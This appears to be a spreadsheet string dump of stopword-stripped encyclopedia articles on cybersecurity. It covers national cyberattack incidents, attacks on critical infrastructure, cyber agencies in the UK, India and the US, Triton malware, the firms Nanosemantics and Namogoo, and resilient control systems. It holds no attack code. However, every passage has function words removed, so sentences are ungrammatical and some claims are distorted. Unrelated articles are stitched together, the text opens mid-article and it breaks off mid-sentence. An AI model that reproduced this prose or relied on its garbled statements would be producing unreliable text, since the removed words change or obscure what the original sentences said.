indian hackers hacked official website election commission pakistan attempt retrieve sensitive database information. retaliation, pakistani hackers, calling "true cyber army" hacked defaced ~1,059 websites indian election bodies.in 2013, india's ministry electronics information technology (meity) known department electronics information technology (deity), unveiled cybersecurity policy framework called national cyber security policy 2013 officially came effect july 2013.according media, pakistan's working effective cyber security system, program called "cyber secure pakistan" (csp). program launched april 2013 pakistan information security association program expanded country's universities. 2020, according media reports, pakistan army confirms series cyber attacks identified pakistani government private websites indian intelligence. ispr also advised government private institutions enhance cyber security measures. iran february 2020, telecommunication network iran witnessed extensive disruptions 11:44 a.m. local time, lasted hour. ministry information communications technology iran confirmed distributed denial service (ddos) attack. iranian authorities activated "digital fortress" cyber-defense mechanism repel. also known dzhafa, drop percent national internet connectivity.on noon october 2021, cyberattack caused 4,300 fuel stations iran disrupt disable government-issued cards buying subsidized fuel. this cyberattack also caused digital billboards display messages iranian government. ireland 2021, health service executive (hse) ireland suffered major ransomware cyberattack caused systems nationwide shut down.it significant cybercrime attack irish state agency largest known attack health service computer system. group responsible identified criminal gang known wizard spider, believed operating russia. group believed attacked ireland's department health similar cyberattack. israel april 2020, attempts hack israel's water infrastructure sharon central region iran, thwarted israeli cyber defenses. cyberattack intended introduce dangerous levels chlorine israeli water supply. north korea norway august 2020 norwegian parliament stortinget suffered cyberattack email system belonging several officials. december 2020, norwegian police security service said likely perpetrators russian cyber espionage group fancy bear. russia during 2018 fifa world cup, russia countered stopped around million cyber-attacks infrastructure.in june 2019, russia conceded "possible" electrical grid cyberattack united states. york times reported american hackers united states cyber command planted malware potentially capable disrupting russian electrical grid.on october 2020, justice department charged russian military officers worldwide hacking campaign, attacked targets like french election, 2018 winter olympic games opening ceremony, businesses ukraine's electricity grid. campaign believed cost billions dollars mass disruption caused. ukraine series powerful cyberattacks began june, 2017, swamped websites ukrainian organizations, including banks, ministries, newspapers electricity firms. january 2022, microsoft disclosed activity ransomware attack various government agencies organizations. united arab emirates 2019, reuters reported united arab emirates launched series cyberattacks political opponents, journalists, human rights activists project raven, espionage platform namely karma. team included ex-us intelligence agents. project raven commenced 2009 planned continued coming years. united arab emirates, used asked help couple countries providing best calibres overcome crisis, confine damage consequences upon project raven, indeed names participate help like american master, graham dexter, egyptian phenomenal name cybersecurity, elhamy elsebaey. united states west, united states provides different "tone voice" cyberwarfare everyone's tongue. united states provides security plans strictly response cyberwarfare, basically going defensive attacked devious cyber methods. u.s., responsibility cybersecurity divided department homeland security, federal bureau investigation, department defense. recent years, department created specifically tend cyber threats, department known cyber command. cyber command military subcommand strategic command responsible dealing threats military cyber infrastructure. cyber command's service elements include army forces cyber command, twenty-fourth force, fleet cyber command marine forces cyber command. ensures president navigate control information systems also military options available defense nation needs enacted cyberspace. individuals cyber command must attention state non-state actors developing cyberwarfare capabilities conducting cyber espionage cyberattacks nation allies. cyber command seeks deterrence factor dissuade potential adversaries attacking u.s., multi-faceted department conducting cyber operations own. three prominent events took place catalysts creation idea cyber command. there failure critical infrastructure reported malicious activities information technology systems disrupted electrical power capabilities overseas. this resulted multi-city power outages across multiple regions. second event exploitation global financial services. november 2008, international bank compromised payment processor allowed fraudulent transactions made automated teller machines cities within 30-minute period. last event systemic loss u.s. economic value industry 2008 estimated trillion losses intellectual property data theft. even though events internal catastrophes, real nature, meaning nothing stop state non-state actors thing even grander scale. other initiatives like cyber training advisory council created improve quality, efficiency, sufficiency training computer network defense, attack, exploitation enemy cyber operations. ends spectrum, east west nations show "sword shield" contrast ideals. chinese offensive minded idea cyberwarfare, trying pre-emptive strike early stages conflict gain upper-hand. u.s. reactionary measures taken creating systems impenetrable barriers protect nation civilians cyberattacks. according homeland preparedness news, many mid-sized u.s. companies difficult time defending systems cyber-attacks. around percent assets vulnerable cyber-attack owned private companies organizations. former york state deputy secretary public safety michael balboni said private entities type capability, bandwidth, interest experience develop proactive cyber analysis."in response cyberattacks april 2015, president obama issued executive order establishing first-ever economic sanctions. executive order impact individuals entities ("designees") responsible cyber-attacks threaten national security, foreign policy, economic health, financial stability specifically, executive order authorizes treasury department freeze designees' assets.according koppel's book, 2008, united states collaboration israel, cyber-attack iran's nuclear program, becoming "the first digital weapon instrument policy". consequence potential attack consequences include multitude direct indirect effects. september 2020, media reported first publicly confirmed case civilian fatality nearly direct consequence cyberattack, ransomware disrupted hospital germany.a whole industry working minimize likelihood consequences cyberattack. partial list see: computer security software companies. activities, often offered products services, aimed studying possible attacks category publishing books articles subject discovering vulnerabilities evaluating risks fixing vulnerabilities inventing, designing deploying countermeasures setting contingency plan order ready respondmany organizations trying classify vulnerability consequences. popular vulnerability database common vulnerabilities exposures. computer emergency response teams governments large organizations handle computer security incidents. infrastructures targets once cyberattack initiated, certain targets need attacked cripple opponent. certain infrastructures targets highlighted critical infrastructures times conflict severely cripple nation. control systems, energy resources, finance, telecommunications, transportation, water facilities seen critical infrastructure targets conflict. report industrial cybersecurity problems, produced british columbia institute technology, consulting group, using data back 1981, reportedly found 10-fold increase number successful cyberattacks infrastructure supervisory control data acquisition (scada) systems since 2000. cyberattacks adverse physical effect known cyber-physical attacks. control systems control systems responsible activating monitoring industrial mechanical controls. many devices integrated computer platforms control valves gates certain physical infrastructures. control systems usually designed remote telemetry devices link physical devices internet access modems. little security offered dealing devices, enabling many hackers cyberterrorists seek systematic vulnerabilities. paul blomgren, manager sales engineering cybersecurity firm explained people drove remote substation, wireless network antenna immediately plugged wireless cards. they took laptops connected system using passwords. "within minutes, mapped every piece equipment facility," blomgren said. "within minutes, mapped every piece equipment operational control network. within minutes, talking business network pulled several business reports. they never even left vehicle." energy energy seen second infrastructure could attacked. broken categories, electricity natural gas. electricity also known electric grids power cities, regions, households; powers machines mechanisms used day-to-day life. using example, conflict cyberterrorists access data daily report system status shows power flows throughout system pinpoint busiest sections grid. shutting grids down, cause mass hysteria, backlog, confusion; also able locate critical areas operation attacks direct method. cyberterrorists access instructions connect bonneville power administration helps direct fault system process. this major advantage utilized cyberattacks made foreign attackers prior knowledge system attack highest accuracy without drawbacks. cyberattacks natural installations much would attacks electrical grids. cyberterrorists shutdown installations stopping flow even reroute flows another section occupied allies. there case russia supplier known gazprom, lost control central switchboard routes flow, inside operator trojan horse program bypassed security.the 2021 colonial pipeline cyberattack caused sudden shutdown pipeline carried gasoline, diesel, fuel consumed east coast united states. finance financial infrastructures could hard cyberattacks financial system linked computer systems. money constantly exchanged institutions cyberterrorists attack transactions rerouted large amounts money stolen, financial industries would collapse civilians would without jobs security. operations would stall region region causing nationwide economic degradation. u.s. alone, average daily volume transactions trillion non-cash flow. able disrupt amount money period days cause lasting damage making investors pull funding erode public confidence. cyberattack financial institution transactions referred cyberheist. these attacks start phishing targets employees, using social engineering coax information them. they allow attackers hack network keyloggers accounting systems. time, cybercriminals able obtain password keys information. organization's bank accounts accessed information stolen using keyloggers. 2013, gang carried us$40 million cyberheist bank muscat. telecommunications cyberattacking telecommunication infrastructures straightforward results. telecommunication integration becoming common practice, systems voice networks merging. everything internet speeds storage capabilities endless. denial-of-service attacks administered previously mentioned, complex attacks made routing protocols infrastructures. less likely attack would target compromise traditional telephony network switches, attempted attack physical devices microwave stations satellite facilities. ability would still shut physical facilities disrupt telephony networks. whole idea cyberattacks people another, disrupt communication, impede critical information sent received. cyberwarfare, critical gaining upper hand conflict. controlling flow information communication, nation plan accurate strikes enact better counter-attack measures enemies. transportation transportation infrastructure mirrors telecommunication facilities: impeding transportation individuals city region, economy slightly degrade time. successful cyberattacks impact scheduling accessibility, creating disruption economic chain. carrying methods impacted, making hard cargo sent place another. january 2003 "slammer" virus, continental airlines forced shut flights computer problems. cyberterrorists target railroads disrupting switches, target flight software impede airplanes, target road usage impede conventional transportation methods. 2015, man, chris roberts, cyberconsultant, revealed repeatedly, 2011 2014, managed hack boeing airbus flights' controls onboard entertainment system, allegedly, least ordered flight climb. fbi, detaining april 2015 syracuse, interviewed allegations. water water infrastructure could critical infrastructures attacked. seen greatest security hazards among computer-controlled systems. there potential massive amounts water unleashed area could unprotected causing loss life property damage. even water supplies could attacked; sewer systems compromised too. there calculation given cost damages, estimated cost replace critical water systems could hundreds billions dollars. most water infrastructures well developed making hard cyberattacks cause significant damage, most, equipment failure occur causing power outlets disrupted short time. hospitals hospital infrastructure major assets impacted cyberattacks. these attacks could "directly lead deaths." cyberattacks designed deny hospital workers access critical care systems. recently, major increase cyberattacks hospitals amid covid-19 pandemic. hackers lock network demand ransom return access systems. icrc human rights group urged enforcement take “immediate decisive action” punish cyberattackers. also references sanaei, isnin, bakhtiari, (2013). performance evaluation routing protocol aodv under wormhole attack. international journal computer networks communications security, volume issue issn 2308-9830. further reading finnemore, martha; hollis, duncan (2020), "beyond naming shaming: accusations international cybersecurity", european journal international law, doi:10.2139/ssrn.3347958, s2cid 159072423 external links july 2015 cyber attacks statistics hackmageddon norse attack term fismapedia</t>
  </si>
  <si>
    <t>National Cyber Range</t>
  </si>
  <si>
    <t>national cyber range project overseen darpa build scale model internet used carry cyber games. project serves test range military create antivirus technologies guard cyberterrorism attacks hackers.several organisations involved development network, including johns hopkins university baltimore lockheed martin. more $500m allocated department defense develop "cyber technologies." references</t>
  </si>
  <si>
    <t>National Cyber Force</t>
  </si>
  <si>
    <t>national cyber force (ncf) intended consolidate offensive cyber activity united kingdom, enabling offensive capability combat security threats, hostile states, terror groups, extremism, hackers, disinformation election interference. organisation specialist unit joint initiative ministry defence (mod) gchq, british intelligence agencies.around £76m invested first year.it operate alongside national cyber security centre (ncsc), primarily concentrates defensive cyber activities protect government departments, strategic infrastructure industry. history plans unit reported media september 2018. since reported delayed "distractions caused uncertainties brexit frequent changes ministers secretaries state mod" turf wars gchq.an april 2021 report produced academics king's college london offensive cyber working group produced recommendations ncf, increase public debate offensive cyber uk.in october 2021 announced based village samlesbury, part 'cyber corridor'. also cyber security community joint operations cell joint threat research intelligence group national cyber crime unit united states cyber command references</t>
  </si>
  <si>
    <t>National Cyber Crime Unit</t>
  </si>
  <si>
    <t>national cyber crime unit (nccu) command united kingdom's national crime agency. with creation national crime agency 2013, unit formed following merge serious organised crime agency's cyber division police central e-crime unit (pceu) metropolitan police service, four current commands look growing cyber crime ways identify it.the current head nccu jamie saunders, formally foreign commonwealth office (fco), january 2012, director international cyber policy. also national crime agency references external links official website</t>
  </si>
  <si>
    <t>National Cyber Coordination Centre</t>
  </si>
  <si>
    <t>national cyber coordination centre (nccc) operational cybersecurity e-surveillance agency india. intended screen communication metadata co-ordinate intelligence gathering activities agencies. some expressed concern body could encroach indian citizens' privacy civil-liberties, given lack explicit privacy laws country. motivation india dedicated cyber-security regulation also well prepared deal cyberwarfare. however, india formulated national cyber security policy 2013 implemented. national cyber coordination centre's purpose would help country deal malicious cyber-activities acting internet traffic monitoring entity fend domestic international attacks.components nccc include cybercrime prevention strategy, cybercrime investigation training review outdated laws. background nccc e-surveillance cybersecurity project government india. classified project indian government without legal framework, counterproductive violate civil liberties human rights.there concerns national cyber coordination centre (nccc) could possibly abused indulging mass surveillance india, privacy violation civil liberty violations agencies like ntro organisations like national security council secretariat exempted applicability transparency like right information act. mass surveillance india india already e-surveillance projects like aadhaar, central monitoring system, natgrid, drdo netra. many, including legal experts, india believe intelligence agencies e-surveillance projects require parliamentary oversight. although nccc jurisdictionally ministry home affairs, coordinates multiple security surveillance agencies well cert-in ministry electronics information technology. status national cyber coordination centre received principle approval 2013 would come national information board. september 2014, indian government discussed establish november 2014 1,000 crore allotted improve indian cybersecurity. from crore would utilised national cyber coordination centre purposes.on august, response question, minister state p.p. chaudhary mentioned phase-1 national cyber coordination centre operational. indian u.s. intelligence agencies also working together curb misuse social media platforms virtual world terror groups. functions government sources mentioned government would also involve internet service providers (isps) ensure round-the-clock monitoring internet, expertise private sector organisations would utilised required. india’s first layer cyber threat monitoring communication government private service providers would body only. nccc virtual contact control room isps scan traffic within country, flowing point entry exit, including international gateway. apart monitoring internet, nccc would look various threats posed cyber attacks. nccc would also address threats faced computer networks government departments organisations handling sensitive government data important websites. national cyber security coordinator first national cyber security coordinator/ cyber-security chief gulshan rai. followed gen. rajesh pant (retd). similar projects projects similar nature: aadhaar central monitoring system natgrid netra references</t>
  </si>
  <si>
    <t>National Cryptologic School</t>
  </si>
  <si>
    <t>national cryptologic school (ncs) school within national security agency provides training members agency. national cryptologic school cryptologic training school within national security agency (nsa). responsible designing, developing, delivering curriculum cryptology, information assurance, language, leadership. opened november 1965, housed multiple campuses, including nsa's friendship annex facility linthicum, maryland.ncs courses provided civilian military population nsa, well intelligence community, military services, central security service (css). many courses accredited american council education council occupational education, eligible transfer credits variety educational institutions. internally, true global training enterprise campuses, four cryptologic centers cryptologic training schools. prestigious national cryptologic school (ncs) offers advanced classes language, cryptology, leadership, education business expertise.training delivered computer-based methods, well traditional classroom setting. employees access thousands web-based training courses developed nsa, well offered variety vendors agencies throughout intelligence community. also dundee society zendian problem government code cypher school references external links svrluga, susan (november 2015). "the school: intelligence community gets smarter, secretly". washington post. retrieved november 2015. "nsa celebrates 50th anniversary national cryptologic school". nsa.gov. november 2015. "event calendar 1965: national cryptologic school approved". national cryptologic museum foundation. april 2018.</t>
  </si>
  <si>
    <t>National Critical Information Infrastructure Protection Centre</t>
  </si>
  <si>
    <t>national critical information infrastructure protection centre (nciipc) organisation government india created section information technology act, 2000 (amended 2008), gazette notification january 2014. based delhi, india, designated national nodal agency terms critical information infrastructure protection. unit national technical research organisation (ntro) therefore comes prime minister's office (pmo). critical information infrastructure information technology act, 2000 defines critical information infrastructure (cii) computer resource, incapacitation destruction which, shall debilitating impact national security, economy, public health safety".nciipc broadly identified following ‘critical sectors’ power energy banking, financial services insurance telecom transport government strategic public enterprisesinformation security practices procedures protected system rules, 2018 vision facilitate safe, secure resilient information infrastructure critical sectors nation." mission take necessary measures facilitate protection critical information infrastructure, unauthorized access, modification, use, disclosure, disruption, incapacitation destruction coherent coordination, synergy raising information security awareness among stakeholders. functions duties national nodal agency measures protect nation's critical information infrastructure. protect deliver advice aims reduce vulnerabilities critical information infrastructure, cyber terrorism, cyber warfare threats. identification critical information infrastructure elements approval appropriate government notifying same. provide strategic leadership coherence across government respond cyber security threats identified critical information infrastructure. coordinate, share, monitor, collect, analyze forecast, national level threat policy guidance, expertise sharing situational awareness early warning alerts. basic responsibility protecting system shall agency running cii. assisting development appropriate plans, adoption standards, sharing best practices refinement procurement processes respect protection critical information infrastructure. evolving protection strategies, policies, vulnerability assessment auditing methodologies plans dissemination implementation protection critical information infrastructure. undertaking research development allied activities, providing funding (including grants-in-aid) creating, collaborating development innovative future technology developing enabling growth skills, working closely wider public sector industries, academia international partners protection critical information infrastructure. developing organising training awareness programs also nurturing development audit certification agencies protection critical information infrastructure. developing executing national international cooperation strategies protection critical information infrastructure. issuing guidelines, advisories vulnerability audit notes etc. relating protection critical information infrastructure practices, procedures, prevention response consultation stake holders, close coordination indian computer emergency response team organisations working field related fields. exchanging cyber incidents information relating attacks vulnerabilities indian computer emergency response team concerned organisations field. event threat critical information infrastructure national critical information infrastructure protection centre call information give directions critical sectors persons serving critical impact critical information infrastructure. operations nciipc maintains 24x7 help desk facilitate reporting incidents. toll free 1800-11-4430. issues advisories alerts provide guidance expertise-sharing addressing threats/vulnerabilities protection cii. event likely/actual national-level threat, plays pivotal role coordinate response various stake-holders close cooperation cert-india. programs nciipc runs number programs engage stakeholders. some follows: responsible vulnerability disclosure program (rvdp) incident response (ir) malware reporting internship courses research scholars, etc. initiatives some major nciipc initiatives follows: incident response responsible vulnerability disclosure program- nciipc runs programs reporting vulnerability critical information infrastructures. training- identification entities partnership formulation training requirements guidelines conducting training stakeholders. range simulate real world threat– simulations critical sectors test defense cii. cyber security preparedness survey, risk assessment, audit, review compliance. interns, research scholars cyber security professionals- nciipc internship program (both full-time part-time) available throughout year. nciipc newsletter nciipc releases quarterly newsletter encompassing latest developments field critical information infrastructure(cii) protection along various initiatives taken nciipc spread awareness best practices much more. april 2022 january 2022 october 2021 july 2021 april 2021 january 2021 october 2020 july 2020 april 2020 january 2020 october 2019 july 2019 april 2019 january 2019 october 2018 july 2018 april 2018 january 2018 october 2017 july 2017 april 2017 january 2017 nciipc guidelines nciipc releases sops guidelines cisos, organisations others enhance cybersecurity defence posture. below copies: nciipc covid-19 guidelines public-private-partnership guidelines identification rules information security practices procedures protected system national cyber security policy, 2013 roles responsibilities cisos guidelines protection evaluating cyber security incident response audit cii/protected systems references external links official website</t>
  </si>
  <si>
    <t>National Collegiate Cyber Defense Competition</t>
  </si>
  <si>
    <t>national collegiate cyber defense competition (nccdc) championship event collegiate cyber defense competition system largest college-level cyber defense competition usa. event held annually antonio area. effort help facilitate development regular, national level cyber security exercise, center infrastructure assurance security university texas antonio (utsa) hosted first collegiate cyber defense competition southwestern region 2005. june 2010, united states house legislature passed recognizing national ccdc promoting cyber security curriculum.while similar cyber defense competitions many aspects, nccdc, unique focuses operational aspect managing protecting existing network infrastructure. while exercises examine abilities group students design, configure, protect network course entire semester, competition focused operational task assuming administrative protective duties existing commercial network. teams assessed based ability detect respond outside threats, maintain availability existing services mail servers servers, respond business requests addition removal additional services, balance security needs business needs. rules nccdc operated rules published center infrastructure assurance security utsa. current rules found homepage. regional competitions several regional groups formed provide qualifying events nccdc annual event. some regions share overlap various states. every effort made make regional event consistent nccdc event. past competitions also list computer science awards notes references external links http://seccdc.org http://maccdc.org</t>
  </si>
  <si>
    <t>National Cyber Security Awareness Month</t>
  </si>
  <si>
    <t>national cyber security awareness month (ncsam) observed october united states america. started national cyber security division within department homeland security nonprofit national cyber security alliance, month raises awareness importance cybersecurity. history 2004, department homeland security national cyber security alliance launched national cyber security awareness month broad effort help americans stay safe secure online. initial efforts included advice like keeping antivirus programs date. since 2009, month included overall theme, "our shared responsibility," weekly themes throughout month introduced 2011 references external links national cyber security awareness month, homeland security national cyber security awareness month, national cyber security alliance cyber security awareness month 2020 champions</t>
  </si>
  <si>
    <t>Triton (malware)</t>
  </si>
  <si>
    <t>triton malware first discovered saudi arabian petrochemical plant 2017. disable safety instrumented systems, contribute plant disaster. called "the world's murderous malware."in december 2017, reported safety systems unidentified power station, believed saudi arabia, compromised triconex industrial safety technology made schneider electric targeted believed state sponsored attack. computer security company symantec claimed malware, known "triton", exploited vulnerability computers running microsoft windows operating system.in 2018, fireeye, company researches cyber-security, reported malware likely came central scientific research institute chemistry mechanics (cniihm), research entity russia. also advanced persistent threat cyber electronic warfare cyber security standards cyberattack cyberterrorism stuxnet references</t>
  </si>
  <si>
    <t>Nanosemantics</t>
  </si>
  <si>
    <t>nanosemantics russian company specializing natural language processing (nlp), computer vision (cv), speech technologies (asr/tts) creation interactive dialog interfaces, particularly chatbots virtual assistants, based artificial intelligence (ai). company uses neural network platforms, including own-made platform puzzlelib works russian-made microprocessor architecture elbrus russia-based astra linux operating system. company founded 2005 igor ashmanov natalya kaspersky. profile company first russian market develop dialog interfaces different branches businesses, well support community developers. company's demanded product, beginning 2020s, automated "online advisers", functioning chat bots, made helping customers usage commercial products. 2009 company released online service called iii.ru, visitors able create ai-based virtual personalities entitles "infs" (for free). visitor able train "inf" chat "live" visitors well "infs". more million "infs" created trained visitors several years.nanosemantics maintains linguistic programming language development called dialog language (dl). popular social networks instant messaging services used base platforms. nanosemantics' bots support different types businesses: banks financial services, telecommunications, retail, travel automobile industry, home appliances production, etc. among solutions, nanosemantics lists projects various companies institutions, among vtb, beeline, mts, sberbank, higher school economics, webmoney, gazpromneft, rostelecom, ford motors, ministry health russian federation others.the company uses term "inf" naming numerous types chat bots. term coined co-founder igor ashmanov, head ashmanov partners. 2014 scholarly research higher school economics, called "basics business informatics", states "infs", used business, lower load employees, collect statistics useful understanding market demand also increase customer loyalty providing fast informative answers usage large databases. research describes nanosemantics' project russian branch ford motors company, capabilities used promoting model ford kuga. research pointed within months since beginning, promo-website conducted 47774 talks visitors specialized "inf", indicated several hundred thousand questions longest chat lasted hours minutes. one-year promo campaign showed 28.6% people made pre-orders talked "inf". 2016 nanosemantics launched saas platform aimed creating customized virtual assistants users.the company's flagship product considered dialog operating system (dialogos), professional corporate platform creating intellectual voice textual bots. linguistic programming language creation flexible scenarios ready-studied neural natural language processing modules able understand human interlocutors. 2021 company presented technology called nlab speech contains neural-networking algorithms processing audio signals analysis texts trained calibrated using speech-based data marked manually. technology allows speed processing data real-time factor" precision values noisy audio data exceed 82%.in march 2022 technology included russia's joint registry russian programs computers databases. well, another technology included: nlab speech tts, text-to-speech system produces synthesized speech printed text. joint projects nanosemantics participates ashmanov partners' projects related since 2014, helps development hardware "personal assistant" called lexy, solution similar amazon alexa analogues.in august 2019 announced nanosemantics going participate creation open operating system creating automated voice assistants. project called sova (smart open virtual assistant) received investment million roubles (~$4,6 million) russian state-maintained national technological initiative.the company maintains long-term partnerships skolkovo innovation center (resident cluster), branch association "neuronet" yandex. together usa-based startup remedy logic, nanosemantics developed medical diagnostic system finding, using spinal pathologies tomography images human bodies. among them: central, foraminal lateral lumbar stenosis, hernias, arthrosis. system offers options treatment.since august 2021 company resident technology valley moscow state university. also 2021, nanosemantics became member committee artificial intelligence within russian association software developers "native soft".the company states missions support initiatives aimed preservation development russian language. 2021, together pushkin institute, company created chat called phil, explains russian people meaning different russian neologisms, offers synonyms them. bot's vocabulary contains neologisms, well give advice jargonisms types specific words. also 2021, nanosemanics signed first-ever russian "codex ethics artificial intelligence". establishes guidelines ethical behavior businesses implement ai-based solutions. contests company regularly organizes all-russian turing test competitions developers. some events co-organized microsoft. during competitions, judges randomly choose virtual interlocutor short conversation them. they determine human machine talking them. interlocutor either human creator operator. results measured cent judges successfully convinced machine human.in 2021 nanosemantics took part federal project "artificial intelligence" national technological initiative.in december 2021 company together state enterprise "resource center universal design rehabilitation technologies" (rcud-rt) held all-russian hackathon aimed development solutions medicine. during days, participants created several training programs patients speech disorders.in april 2022, another hackathon nanosemantics held together mirea russian technological university. students participating trying generate algorythms voice deepfakes. teams contested creation software generated artificial voice certain person. recognition since foundation, nanosemantics received number recognitions awards. among several professional rotor awards website iii.ru (created 2009). website gives general public means create train virtual assistants, used website integrated social networks. 2013, virtual assistant called dana, created "beeline kazakhstan", awarded professional prize "crystal headset" nomination "the best applying technology". 2015, rbth international media service included nanosemantics list "top startups" russia.in 2016, company received russian state-maintained award called runet prize nominations: "state society" "technology innovation".in 2021, velikiy novgorod, nanosemantics team hackathon aimed finding means discovering corruption schemes russian laws.in february 2022 company another contest national technological initiative, called "prochtenie", aimed creation systems checking schoolchildren's school essays. nanosemantics team awarded million rubles "overcoming technological barrier" contest dedicated english language, million place special nomination "structure" russian-language essay contest. references</t>
  </si>
  <si>
    <t>Namogoo</t>
  </si>
  <si>
    <t>namogoo technologies ltd. digital journey continuity software service platform, autonomously adapts customer visit real-time, helps improve online customer journeys business results global retail brands. namogoo's customer hijacking prevention identifies blocks unauthorized injections diverting online shoppers competitors. namogoo's intent-based promotions predicts individualizes minimum promotion visit synchronizing customer intent company business goals. history namogoo founded august 2014 entrepreneurs chemi katz ohad greenshpan. december 2014, company launched customer hijacking prevention platform, detects blocks malicious content unauthorized injected onto visitor sessions.in september 2014, namogoo received initial funding round million blumberg capital inimiti capital.in april 2017, namogoo opened sales headquarters boston, mass. february 2017, namogoo raised million series funding, greatpoint ventures. blumberg capital inimiti capital also participated round. 2018, namogoo received series investment round million hanaco ventures, well existing investors greatpoint ventures, blumberg capital inimiti capital.in 2018, namogoo received 2018 mitx award technology innovation retail ecommerce category. annual awards hosted massachusetts innovation technology exchange (mitx) given technologies impact future customer experience. june 2018, namogoo named 2018 cool vendor digital commerce research advisory firm gartner. companies selected cool vendor report meet gartner's criteria technologies innovative, impactful intriguing. september 2019, namogoo ranked best startup work israel bradstreet(d&amp;b). this first year d&amp;b's annual rankings included category startups addition list companies work israel.in october 2019, namogoo raised series funding round million hc/ft well existing investors greatpoint ventures, hanaco venture capital, blumberg capital. this brought company's total funding million.in february 2020, namogoo appointed ritzcovan chief revenue office based york, einat etzioni chief marketing officer based israel.in 2020, namogoo completed strategic acquisition behavioral analytics platform personali.in january 2021, namogoo launched intent-based promotions, autonomously optimizes promotion spend synchronizing ecommerce brands’ business goals real-time shopper intent, preventing customer journey abandonment increasing revenue technology namogoo's cloud-based service, built proprietary, machine learning technology, detects blocks invasive content spread across ecommerce sites. this learning technology monitors analyzes millions sessions server customer browsers based pattern analysis techniques classifies activity prevents running. namogoo's proactive core engine leverages thousands data points related deep content inspection, statistical analysis, indicative behavioral patterns order reach decisions. identifying blocking customer journey hijacking activities divert earned traffic hurt conversion rates, ecommerce businesses able preserve intended online experience improve business metrics. customer journey hijacking customer journey hijacking rapidly growing phenomenon unauthorized injected consumer browsers. various injected include competing product recommendation widgets, banners, pop-ups, in-text redirects inserted visitor's session. driven digital malware downloaded connections, free software bundles, unsecured wifi networks. this disrupts intended online experience, diverts earned traffic away ecommerce websites, cutting directly conversions revenue. majority injected redirect customers competitor websites promotions. unsavory content also featured across site impacts brand equity. injections consumer's browser bypass server-side visibility control activity. references external links official website company blog</t>
  </si>
  <si>
    <t>Resilient control systems</t>
  </si>
  <si>
    <t>modern society, computerized digital control systems used reliably automate many industrial operations take granted, power plant automobiles drive. however, complexity systems designers integrate them, roles responsibilities humans interact systems, cyber security highly networked systems paradigm research philosophy next-generation control systems. resilient control systems consider elements disciplines contribute effective design, cognitive psychology, computer science, control engineering develop interdisciplinary solutions. these solutions consider things tailor control system operating displays best enable user make accurate reproducible response, design cybersecurity protections system defends attack changing behaviors, better integrate widely distributed computer control systems prevent cascading failures result disruptions critical industrial operations. context cyber-physical systems, resilient control systems aspect focuses unique interdependencies control system, compared information technology computer systems networks, importance operating critical industrial operations. introduction originally intended provide efficient mechanism controlling industrial operations, development digital control systems allowed flexibility integrating distributed sensors operating logic maintaining centralized interface human monitoring interaction. this ease readily adding sensors logic software, done relays isolated analog instruments, wide acceptance integration systems industries. however, digital control systems often integrated phases cover different aspects industrial operation, connected network, leading complex interconnected interdependent system. while control theory applied often nothing digital version analog counterparts, dependence digital control systems upon communications networks, precipitated need cybersecurity potential effects confidentiality, integrity availability information. achieve resilience next generation control systems, therefore, addressing complex control system interdependencies, including human systems interaction cybersecurity, recognized challenge. defining resilience research resilience engineering last decade focused areas, organizational information technology. organizational resilience considers ability organization adapt survive face threats, including prevention mitigation unsafe, hazardous compromising conditions threaten existence. information technology resilience considered number standpoints networking resilience considered quality service. computing considered issues dependability performance face unanticipated changes however, based upon application control dynamics industrial processes, functionality determinism primary considerations captured traditional objectives information technology. .considering paradigm control systems, definition suggested "resilient control systems tolerate fluctuations structure, design parameters, control structure control parameters". however, definition taken perspective control theory application control system. consideration malicious actor cyber security directly considered, might suggest definition, effective reconstitution control attack intelligent adversaries," proposed. however, definition focuses resilience response malicious actor. consider cyber-physical aspects control system, definition resilience considers benign malicious human interaction, addition complex interdependencies control system application .the term “recovery” used context resilience, paralleling response rubber ball stay intact force exerted recover original dimensions force removed. considering rubber ball terms system, resilience could defined ability maintain desired level performance normalcy without irrecoverable consequences. while resilience context based upon yield strength ball, control systems require interaction environment, namely sensors, valves, pumps make industrial operation. reactive environment, control systems require awareness state make corrective changes industrial process maintain normalcy. with mind, consideration discussed cyber-physical aspects human systems integration cyber security, well definitions resilience broader critical infrastructure level, following deduced definition resilient control system: resilient control system maintains state awareness accepted level operational normalcy response disturbances, including threats unexpected malicious nature" considering flow digital control system basis, resilient control system framework designed. referring left side fig. resilient control system holistically considers measures performance normalcy state space. center, understanding performance priority provide basis appropriate response combination human automation, embedded within multi-agent, semi-autonomous framework. finally, right, information must tailored consumer address need position desirable response. several examples scenarios resilience differs provides benefit control system design available literature. areas resilience some primary tenets resilience, contrasted traditional reliability, presented considering integrated approach resilient control systems. these cyber-physical tenants complement fundamental concept dependable reliable computing characterizing resilience regard control system concerns, including design considerations provide level understanding assurance safe secure operation industrial facility. these tenants discussed individually summarize challenges address order achieve resilience. human systems benign human ability quickly understand novel solutions, provide ability adapt unexpected conditions. this behavior provide additional resilience control system, reproducibly predicting human behavior continuing challenge. ability capture historic human preferences applied bayesian inference bayesian belief networks, ideally solution would consider direct understanding human state using sensors eeg. considering control system design interaction, goal would tailor amount automation necessary achieve level optimal resilience mixed initiative response. presented human would actionable information provides basis targeted, reproducible response. cyber security contrast challenges prediction integration benign human control systems, abilities malicious actor hacker) undermine desired control system behavior also create significant challenge control system resilience. application dynamic probabilistic risk analysis used human reliability provide basis benign actor. however, decidedly malicious intentions adversarial individual, organization nation make modeling human variable objectives motives. however, defining control system response intentions, malicious actor looks forward level recognized behavior gain advantage provide pathway undermining system. whether performed separately preparation cyber attack, system itself, behaviors provide opportunity successful attack without detection. therefore, considering resilient control system architecture, atypical designs imbed active passively implemented randomization attributes, would suggested reduce advantage. complex networks networked control systems while much current critical infrastructure controlled interconnected control systems, either architecture termed distributed control systems (dcs) supervisory control data acquisition (scada), application control moving toward decentralized state. moving smart grid, complex interconnected nature individual homes, commercial facilities diverse power generation storage creates opportunity challenge ensuring resulting system resilient threats. ability operate systems achieve global optimum multiple considerations, overall efficiency, stability security, require mechanisms holistically design complex networked control systems. multi-agent methods suggest mechanism global objective distributed assets, allowing management coordination assets optimal benefit semi-autonomous, constrained controllers react rapidly maintain resilience rapidly changing conditions. base metrics resilient control systems establishing metric capture resilience attributes complex, least considered based upon differences interactions interdependencies. evaluating control, cyber cognitive disturbances, especially considered disciplinary standpoint, leads measures already established. however, metric instead based upon normalizing dynamic attribute, performance characteristic impacted degradation, alternative suggested. specifically, applications base metrics resilience characteristics given follows type disturbance: physical disturbances: time latency affecting stability data integrity affecting stability cyber disturbances: time latency data confidentiality, integrity availability cognitive disturbances: time latency response data digression desired responsesuch performance characteristics exist time data integrity. time, terms delay mission communications latency, data, terms corruption modification, normalizing 